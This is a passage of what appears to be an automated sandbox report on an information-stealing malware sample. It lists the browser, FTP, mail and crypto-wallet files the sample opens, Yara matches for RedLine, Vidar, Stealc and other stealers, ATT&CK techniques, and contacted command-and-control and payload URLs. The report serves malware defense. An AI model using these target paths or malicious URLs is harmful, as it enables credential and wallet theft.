Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 18.2.MSBuild.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.60900c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.5dd00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.60900c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.5dd00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2374551290.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2139879271.0000000006090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2374844469.0000000000822000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5c4.0.exe PID: 416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 1524, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\pasb, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\khjsru, type: DROPPED

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 1.2.u5c4.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5c4.0.exe.4300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5c4.0.exe.42d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5c4.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5c4.0.exe.4300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5c4.0.exe.42d0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1743780115.0000000004300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f7ae0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f7ae0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f79a0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f79a0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a1537d.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a247a3.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a34dad.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2126631376.00000240F198B000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 18.2.MSBuild.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.60900c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.5dd00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.60900c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.5dd00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2374551290.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2139879271.0000000006090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2374844469.0000000000822000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 1524, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\pasb, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\khjsru, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2500095496.000000000436A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5c4.0.exe PID: 416, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.2.u5c4.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5c4.0.exe.4300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5c4.0.exe.42d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5c4.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u5c4.0.exe.4300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u5c4.0.exe.42d0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1743780115.0000000004300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u5c4.0.exe PID: 416, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a1537d.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a247a3.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a34dad.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC80B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	1_2_6BC80B40
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBA8EA0 sqlite3_clear_bindings,	1_2_6BBA8EA0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC80D60 sqlite3_bind_parameter_name,	1_2_6BC80D60
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC80C40 sqlite3_bind_zeroblob,	1_2_6BC80C40
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBA63C0 PR_Bind,	1_2_6BBA63C0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BB322D0 sqlite3_bind_blob,	1_2_6BB322D0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBA60B0 listen,WSAGetLastError,	1_2_6BBA60B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBAC030 sqlite3_bind_parameter_count,	1_2_6BBAC030
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBA6070 PR_Listen,	1_2_6BBA6070
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBAC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	1_2_6BBAC050
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBA6410 bind,WSAGetLastError,	1_2_6BBA6410

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	341 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	13 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Windows Service	11 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	22 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	1 Windows Service	1 Abuse Elevation Control Mechanism	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	312 Process Injection	3 Obfuscated Files or Information	NTDS	289 System Information Discovery	Distributed Component Object Model	1 Email Collection	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Software Packing	LSA Secrets	551 Security Software Discovery	SSH	11 Input Capture	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 DLL Side-Loading	Cached Domain Credentials	351 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	351 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
kO1P1YnLst.exe	50%	ReversingLabs	Win32.Trojan.Generic
kO1P1YnLst.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\pasb	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\khjsru	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\pasb	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\u5c4.0.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\khjsru	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	47%	ReversingLabs	Win32.Spyware.Stealc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe	47%	ReversingLabs	Win32.Spyware.Stealc
C:\Users\user\AppData\Local\Temp\khjsru	65%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\pasb	65%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\u5c4.2\UIxMarketPlugin.dll	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\u5c4.2\relay.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u5c4.3.exe	4%	ReversingLabs
C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\SecureClient\relay.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.indyproject.org/	0%	URL Reputation	safe
https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts	0%	URL Reputation	safe
https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense	0%	Avira URL Cloud	safe
http://microsoft.co	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.phpeb42eb8dbe78cdaae1ee01f89185a	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/mozglue.dllL	0%	Avira URL Cloud	safe
http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08	0%	Avira URL Cloud	safe
http://185.172.128.228/BroomSetup.exe	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.php	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/sqlite3.dll	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/freebl3.dllZ	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/softokn3.dll	0%	Avira URL Cloud	safe
http://185.172.128.59/syncUpd.exe	100%	Avira URL Cloud	malware
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts	0%	Avira URL Cloud	safe
http://185.172.128.76	0%	Avira URL Cloud	safe
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/mozglue.dll	0%	Avira URL Cloud	safe
https://scripts.sil.4	0%	Avira URL Cloud	safe
http://185.172.128.203/tiktok.exe	100%	Avira URL Cloud	malware
http://185.172.128.203/tiktok.exe00	0%	Avira URL Cloud	safe
http://185.172.128.228/ping.php?substr=eight	100%	Avira URL Cloud	malware
http://185.172.128.76/15f649199f40275b/nss3.dll	0%	Avira URL Cloud	safe
http://185.172.128.203/tiktok.exek	0%	Avira URL Cloud	safe
https://westus2-2.in.applicationinsights.azure.com0p5	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/msvcp140.dll	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.phpW	0%	Avira URL Cloud	safe
http://note.padd.cn.com/1/Package.zip	0%	Avira URL Cloud	safe
http://91.215.85.66:9000	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
iolo0.b-cdn.net	169.150.236.100	true	false	high
note.padd.cn.com	176.97.76.106	true	false	unknown
svc.iolo.com	20.157.87.45	true	false	high
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	unknown
download.iolo.net	unknown	unknown	true	unknown
westus2-2.in.applicationinsights.azure.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.215.85.66:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08	true	Avira URL Cloud: safe	unknown
http://185.172.128.228/BroomSetup.exe	false	Avira URL Cloud: safe	unknown
http://185.172.128.76/3cd2b41cbde8fc9c.php	true	Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/sqlite3.dll	true	Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/softokn3.dll	true	Avira URL Cloud: safe	unknown
http://185.172.128.59/syncUpd.exe	false	Avira URL Cloud: malware	unknown
http://185.172.128.76/15f649199f40275b/nss3.dll	true	Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/mozglue.dll	true	Avira URL Cloud: safe	unknown
http://185.172.128.203/tiktok.exe	false	Avira URL Cloud: malware	unknown
http://185.172.128.228/ping.php?substr=eight	false	Avira URL Cloud: malware	unknown
http://185.172.128.76/15f649199f40275b/msvcp140.dll	true	Avira URL Cloud: safe	unknown
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx	false		high
http://note.padd.cn.com/1/Package.zip	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.00000000040E6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004059000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004173000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004201000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003009000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.000000000309D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	u5c4.0.exe, 00000001.00000002.2500095496.00000000043C6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000004158000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003131000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003067000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.0000000003F3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000003223000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.3002800911.000000000403E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 